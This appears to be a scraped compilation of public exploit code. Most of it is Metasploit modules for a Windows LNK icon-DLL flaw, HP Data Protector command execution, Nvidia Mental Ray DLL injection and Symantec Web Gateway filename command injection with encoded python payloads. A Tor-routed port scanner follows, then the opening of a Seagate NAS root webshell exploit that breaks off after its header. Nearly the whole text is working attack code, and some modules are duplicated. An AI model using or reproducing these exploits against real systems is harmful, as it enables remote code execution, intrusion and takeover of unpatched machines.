  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE attr_accessor :dll_base_name attr_accessor :exploit_dll_base_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates the required files to exploit the vulnerability. They must be uploaded to an UNC path accessible by the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']), OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']), OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']), ], self.class) end def smb_host "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\" end def exploit_dll_filename name_length = 
257 - (smb_host.length + 4 + 2) self.dll_base_name = dll_base_name || rand_text_alpha(1) self.exploit_dll_base_name = exploit_dll_base_name || rand_text_alpha(name_length) "#{dll_base_name} #{exploit_dll_base_name}.dll" end def dll_filename self.dll_base_name = dll_base_name || rand_text_alpha(1) "#{dll_base_name}.dll" end def create_exploit_file(file_name, data) unless ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end path = File.join(Msf::Config.local_directory, file_name) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } full_path end def dll_create(data) full_path = create_exploit_file(dll_filename, data) print_good "DLL with payload stored at #{full_path}" end def exploit_dll_create(data) full_path = create_exploit_file(exploit_dll_filename, data) print_good "Fake dll to exploit stored at #{full_path}" end def exploit dll = generate_payload_dll dll_create(dll) exploit_dll_create(dll) lnk = generate_link("#{smb_host}#{exploit_dll_filename}") file_create(lnk) end # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H' def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 
0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::SMB::Server::Share attr_accessor :exploit_dll_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This creates an SMB resource to provide the payload and the trigger, and generates a LNK file which must be sent to the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) ], self.class) register_advanced_options( [ OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME') end def smb_host "\\\\#{srvhost}\\#{share}\\" end def setup super self.file_contents = generate_payload_dll random_char = 
rand_text_alpha(1) self.file_name = "#{random_char}.dll" prefix = "#{random_char} " random_length = 257 - smb_host.length - file_name.length - prefix.length self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" print_status("Payload available on #{unc}...") print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") end def primer lnk = generate_link("#{smb_host}#{exploit_dll_name}") file_create(lnk) print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? 
return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection', 'Description' => %q{ The Nvidia Mental Ray Satellite Service listens for control commands on port 7414. When it receives the command to load a DLL (via an UNC path) it will try to connect back to the host on port 7514. If a TCP connection is successful it will then attempt to load the DLL. This module has been tested successfully on Win7 x64 with Nvidia Mental Ray Satellite Service v3.11.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Discovery 'Donato Ferrante', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'References' => [ [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'win', 'Targets' => [ [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ] ], 'Privileged' => true, 'DisclosureDate' => 'Dec 10 2013', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(7414), OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("Trying to execute remote DLL...") send_exploit end def setup super # These lengths are required, although we specify the UNC path # length in the exploit, the header probably has another length # value we don't adjust. 
self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end def send_exploit # No idea what most of this hello is... hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7" hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000" hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000" hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f" hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000" hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000" hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000" hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009" hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000" hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000" hello << "0000000030000000a000000" hello = Rex::Text.hex_to_raw(hello) # Start of command - again no idea what this is... load_dll = Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013") # Length of path string including null byte load_dll << [unc.length + 1].pack('V') # Data type? load_dll << [2].pack('V') # Assembly Load? load_dll << "AL" load_dll << unc << "\x00" # Some padding at the end... load_dll << rand_text_alpha(1386 - unc.length) # We have to start a second listening port although we dont actually care about # handling client connections. 
It appears as long as the service can make a # connection its happy and will move onto the DLL loading create_listen_port vprint_status("Connecting to target and sending commands") connect sock.put(hello) sock.put(load_dll) print_status("Instructed the service to load #{unc}...") end def create_listen_port port = datastore['LISTEN_PORT'] comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end @listener = Rex::Socket::TcpServer.create( 'LocalHost' => datastore['SRVHOST'], 'LocalPort' => port, 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) # Register callbacks @listener.on_client_connect_proc = proc { |cli| add_socket(cli) begin print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...") ensure # Need to close the socket for the SMB request to be # initiated... remove_socket(cli) end } @listener.start vprint_status("Started listening on TCP port #{port}") end def cleanup super return unless @listener begin @listener.deref if @listener.is_a?(Rex::Service) if @listener.is_a?(Rex::Socket) @listener.close @listener.stop end @listener = nil rescue ::Exception end end end Source
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? 
return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source
  6. This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Egidio Romano', # Original discovery & assist of MSF module 'sinn3r' ], 'References' => [ [ 'CVE', '2014-7285' ], [ 'OSVDB', '116009' ], [ 'BID', '71620' ], [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00'] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5', {}] ], 'Privileged' => false, 'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014) 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password for the username']) ], self.class) end def protocol ssl ? 
'https' : 'http' end def check uri = target_uri.path res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')}) if res && res.body.include?('Symantec Web Gateway') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def get_sid sid = '' uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'GET', }) unless res fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' sid end def login(sid) uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'POST', 'cookie' => sid, 'headers' => { 'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}" }, 'vars_post' => { 'USERNAME' => datastore['USERNAME'], 'PASSWORD' => datastore['PASSWORD'], 'loginBtn' => 'Login' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to login') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank? # Successful login return sid else # Failed login fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") end end def build_payload # At of today (Feb 27 2015), there are only three payloads this module will support: # * cmd/unix/generic # * cmd/unix/reverse_python # * cmd/unix/reverse_python_ssl p = payload.encoded case datastore['PAYLOAD'] when /cmd\/unix\/generic/ # Filter that one out, Mr. 
basename() p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))") p = "python -c \"exec('#{p}'.decode('base64'))\"" else p = p.gsub(/python -c "exec/, 'python -c \\"exec') p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"") end p end def build_mime p = build_payload data = Rex::MIME::Message.new data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"') data.add_part('maintenance', nil, nil, 'form-data; name="configuration"') data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""') data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"') data.add_part('', nil, nil, 'form-data; name="restore"') data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"") data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"') data.add_part('0', nil, nil, 'form-data; name="event_horizon"') data.add_part('0', nil, nil, 'form-data; name="max_events"') data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"') data.add_part('', nil, nil, 'form-data; name="testaddress"') data.add_part('', nil, nil, 'form-data; name="pingaddress"') data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"') data.add_part('', nil, nil, 'form-data; name="capture_filter"') data end def inject_exec(sid) uri = target_uri.path mime = build_mime # Payload inside send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/restore.php'), 'method' => 'POST', 'cookie' => sid, 'data' => mime.to_s, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'headers' => { 'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}" } }) end def save_cred(username, password) service_data = { address: rhost, port: rport, service_name: protocol, protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: 
self.fullname, origin_type: :service, username: username, private_data: password, private_type: :password }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL }.merge(service_data) create_credential_login(login_data) end def exploit print_status("Getting the PHPSESSID...") sid = get_sid if sid.blank? print_error("Failed to get the session ID. Cannot continue with the login.") return end print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") sid = login(sid) if sid.blank? print_error("Failed to get the session ID from the login process. Cannot continue with the injection.") return else # Good password, keep it save_cred(datastore['USERNAME'], datastore['PASSWORD']) end print_status("Trying restore.php...") inject_exec(sid) end end Source
  7. # tmap 0.1 # Coded by TheKingOf9x <AT> yandex . com # Fast multi-threaded port scanner which tunnels through TOR. # Depends on the PySocks library: https://github.com/Anorov/PySocks # And of course TOR: apt-get install tor # # Do not use hostnames, may leak DNS info. only use IP addresses. # # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this. # # Usage: # python tmap.py import sys import socks import datetime import threading lock = threading.Semaphore(value = 1) #Port of TOR server TOR_PORT = 9050 #timeout. Experiment with this. TIMEOUT = 20 #Port list to scan, ammend at will ports = (21,22,23,80,443,1433,3306,8080) def main(): if len(sys.argv) < 3: print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m") print("Single host scan:\npython " + sys.argv[0] + " -s 192.168.0.1\n") print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n") print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n") exit(0) scan_type = sys.argv[1] parameter = sys.argv[2] filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap") try: log = open(filename, "a") except: pass if scan_type == "-s": host_scan(parameter, log) elif scan_type == "-r": range_scan(parameter, log) elif scan_type == "-l": list_scan(parameter, log) else: exit(1) #main connect function def connect(ip, port, log): try: s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', TOR_PORT) s.settimeout(TIMEOUT) s.connect((ip, port)) output = ip + ":" + str(port) lock.acquire() # Lock/unlock to clean up screen output. print(output) try: log.write(output + "\n") except: pass except: pass finally: lock.release() def host_scan(ip, log): ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass def range_scan(ip, log): ip = ip.strip() for i in range(1, 255): ip_addr = ip + "." 
+ str(i) for port in ports: try: t = threading.Thread(target=connect, args=(ip_addr, port, log)) t.start() except: pass def list_scan(parameter, log): try: f = open(parameter, 'r') except: print("Could not open file: " + parameter) exit(1) for ip in f: ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass if __name__ == '__main__': main() Download Source
  8. #!/usr/bin/env python # # Seagape # ======= # Seagate Business NAS pre-authentication remote code execution # exploit as root user. # # by OJ Reeves (@TheColonial) - for full details please see # https://beyondbinary.io/advisory/seagate-nas-rce/ # # Usage # ===== # seagape.py <ip> <port> [-c [ua]] # # - ip : ip or host name of the target NAS # - port : port of the admin web ui # - -c : (optional) create a cookie which will give admin access. # Not specifying this flag results in webshell installation. # - ua : (optional) the user agent used by the browser for the # admin session (UA must match the target browser). # Default value is listed below # # Example # ======= # Install and interact with the web shell: # seagape.py 192.168.0.1 80 # # Create admin cookie # seagape.py 192.168.0.1 80 -c import base64 import hashlib import itertools import os import re import socket import sys import urllib import urllib2 import uuid import xml.sax.saxutils if len(sys.argv) < 3: print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0]) sys.exit(1) # Every Seagate nas has the same XOR key. Great. 
